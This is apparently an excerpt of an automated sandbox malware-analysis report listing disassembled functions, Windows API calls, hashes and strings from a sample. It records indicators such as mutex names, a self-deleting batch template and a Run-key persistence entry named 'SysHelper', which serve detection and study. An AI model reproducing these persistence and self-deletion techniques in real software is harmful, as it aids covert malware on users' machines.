                                                                                                                                                                        • Instruction Fuzzy Hash: B911507732518187D634AA3DC4F46FBE7D5EBC5321B2C43FAD0418B754D2E2E9459500
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9A660 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                                                        • Instruction ID: de545c56ce1833d3c4c6c44b56e34dbbea26210d035a8fa0ee9e5757baaa6f6c
                                                                                                                                                                        • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                                                        • Instruction Fuzzy Hash: B9111F4A8492C4BDCF424A7840E56EBFFA58E37218F5A71DAC8C45B753D01B190FE7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B99DFA Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                                                                        • Instruction ID: 64dd4a218aef3dc6f96347c71e1a0030fb074e9362b39771b07f6be4223563b4
                                                                                                                                                                        • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                                                                        • Instruction Fuzzy Hash: 870128768106669BD740DF3EC8C045AFBF1BB082117528B3AD89083A41D334E666DBE4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B91193 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: aed99fe01a9636375447950776c2bd949a2831d680206497a64bf89cf4b34b28
                                                                                                                                                                        • Instruction ID: d1890f6e6d96a82c25d288796f4dd1296d1f550c8549abc7b0bb2822a35e366c
                                                                                                                                                                        • Opcode Fuzzy Hash: aed99fe01a9636375447950776c2bd949a2831d680206497a64bf89cf4b34b28
                                                                                                                                                                        • Instruction Fuzzy Hash: 3BE086754000176AEE11CE29DD81BA5B3E2F7E1724F484DA4E44597009D33595199762
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA24E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00BA24FE
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA2509
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA251C
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA2539
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00BA2550
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA255B
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA256E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                                                        • Opcode ID: ad97fe9ded9a3e69714c1a41aafa4cc4e54471e9a91f3a81a26bd0f6e13ee7a4
                                                                                                                                                                        • Instruction ID: fdac842f379589111c7ec5d844147b7be0fb0e0568770eb0e58c8d148fd2b1a7
                                                                                                                                                                        • Opcode Fuzzy Hash: ad97fe9ded9a3e69714c1a41aafa4cc4e54471e9a91f3a81a26bd0f6e13ee7a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C714A76940318AFDF109BA4DC89FEE77ACFB44305F1006A6F609E6091DB759A88CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BF35B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                                                        • Opcode ID: 6d7811b8b90090a75ea3561956d61a17309f9ce981fba76ce061be252220d0f0
                                                                                                                                                                        • Instruction ID: 68e8dad617ac53ed1dd0cd441436675d2a0f22fa4b4a7e786e8ab677f5fbd798
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d7811b8b90090a75ea3561956d61a17309f9ce981fba76ce061be252220d0f0
                                                                                                                                                                        • Instruction Fuzzy Hash: 01F1E7716083456BD721EA64DC42FBBB7D89F54B04F0448A9FA8DD7283E7B4DA088793
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB5A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                                                        • Opcode ID: fa085ced43b5654e2a462c9bafaff3ccc85749c76fe9f570ac06cc4a6e3b859b
                                                                                                                                                                        • Instruction ID: dbb26f32a6604b9274beea6f45da0730fb0fc398e0a68e0bc9c33709987c63b6
                                                                                                                                                                        • Opcode Fuzzy Hash: fa085ced43b5654e2a462c9bafaff3ccc85749c76fe9f570ac06cc4a6e3b859b
                                                                                                                                                                        • Instruction Fuzzy Hash: A4219235105A01ABE7327F64DC42FFFBBD4DF51750B2444E9F484650A2EAE19810DBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BABAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00BABB49
                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00BABBBA
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BABBE4
                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00BABBF4
                                                                                                                                                                        • _free.LIBCMT ref: 00BABCD7
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D12
                                                                                                                                                                          • Part of subcall function 00BA1CD0: _memset.LIBCMT ref: 00BA1D3B
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00BA1D63
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D6C
                                                                                                                                                                          • Part of subcall function 00BA1CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00BA1DD6
                                                                                                                                                                          • Part of subcall function 00BA1CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00BA1E48
                                                                                                                                                                        • IsWindow.USER32(?), ref: 00BABF69
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00BABF7B
                                                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00BABFA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3873257347-0
                                                                                                                                                                        • Opcode ID: 50abb587c82391c6707b3786b97f3a16420f7ecb8160673fe7fcbe035e9f0950
                                                                                                                                                                        • Instruction ID: bb56e5a441537d8d801f308c69661b8fa493555c606e65308cf7c1279daf3bca
                                                                                                                                                                        • Opcode Fuzzy Hash: 50abb587c82391c6707b3786b97f3a16420f7ecb8160673fe7fcbe035e9f0950
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C1BE7150C3809FDB20DF28D845BAABBE4FF86314F144A6DF498972A2D7769844CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB70A5 Relevance: 18.3, APIs: 12, Instructions: 289COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 559064418-0
                                                                                                                                                                        • Opcode ID: 37e9d5bd7dde726aa5b1fc295f663e5e1b1e6b3504a0e8c295e71df5bebb35df
                                                                                                                                                                        • Instruction ID: 4fb1f63f0ea527b7578893ba352f856bc62d4c6db920d9cd469a44b9964aaf5b
                                                                                                                                                                        • Opcode Fuzzy Hash: 37e9d5bd7dde726aa5b1fc295f663e5e1b1e6b3504a0e8c295e71df5bebb35df
                                                                                                                                                                        • Instruction Fuzzy Hash: 08B17C719892299FDF309B58CC88BFDBBF5EB94310F1400D9D809A6251DBB49E80DF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB7B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DecodePointer.KERNEL32 ref: 00BB7B29
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B42
                                                                                                                                                                          • Part of subcall function 00BB0BED: HeapFree.KERNEL32(00000000,00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C13
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B55
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B73
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B85
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B96
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7BA1
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7BC5
                                                                                                                                                                        • EncodePointer.KERNEL32(00DC2350), ref: 00BB7BCC
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7BE1
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7BF7
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7C1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3064303923-0
                                                                                                                                                                        • Opcode ID: 19e29db9f23a069e83c932a45e6f99b51c90d59ee227978b05652e331f132c6e
                                                                                                                                                                        • Instruction ID: afd9e486a4f3aaaedd88ad41a331b805900f0cee3720518116fbb04433119ca7
                                                                                                                                                                        • Opcode Fuzzy Hash: 19e29db9f23a069e83c932a45e6f99b51c90d59ee227978b05652e331f132c6e
                                                                                                                                                                        • Instruction Fuzzy Hash: B82182758482608BCB306F55FC85FBE77E4F745368B2544BEEA0857260CBB47C808E90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00BA1BB0
                                                                                                                                                                        • CoCreateInstance.OLE32(00C5E908,00000000,00000001,00C5D568,00000000), ref: 00BA1BC8
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00BA1BD0
                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00BA1C12
                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00BA1C22
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00C90050), ref: 00BA1C3A
                                                                                                                                                                        • lstrcatW.KERNEL32(?), ref: 00BA1C44
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00BA1C68
                                                                                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00BA1C7A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                                        • String ID: \shell32.dll
                                                                                                                                                                        • API String ID: 679253221-3783449302
                                                                                                                                                                        • Opcode ID: d52f18afaaacf6a4a00a91386838174b5b3a14257d50734971f0fdbb8e646218
                                                                                                                                                                        • Instruction ID: 715bfff74389fcde55ace5a895b8fd144e31d55660abdd48de370105637e3aaa
                                                                                                                                                                        • Opcode Fuzzy Hash: d52f18afaaacf6a4a00a91386838174b5b3a14257d50734971f0fdbb8e646218
                                                                                                                                                                        • Instruction Fuzzy Hash: 21413A74A40319AFDB10CBA4DC88FEE7BBDEF89705F104499B605EB150D6B1AA85CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE49A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000001,?,00BE4B72), ref: 00BE49C7
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BE49D7
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BE49FB
                                                                                                                                                                        • GetProcessWindowStation.USER32(?,00BE4B72), ref: 00BE4A01
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00BE4B72), ref: 00BE4A1C
                                                                                                                                                                        • GetLastError.KERNEL32(?,00BE4B72), ref: 00BE4A2A
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00BE4B72), ref: 00BE4A65
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BE4A8A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
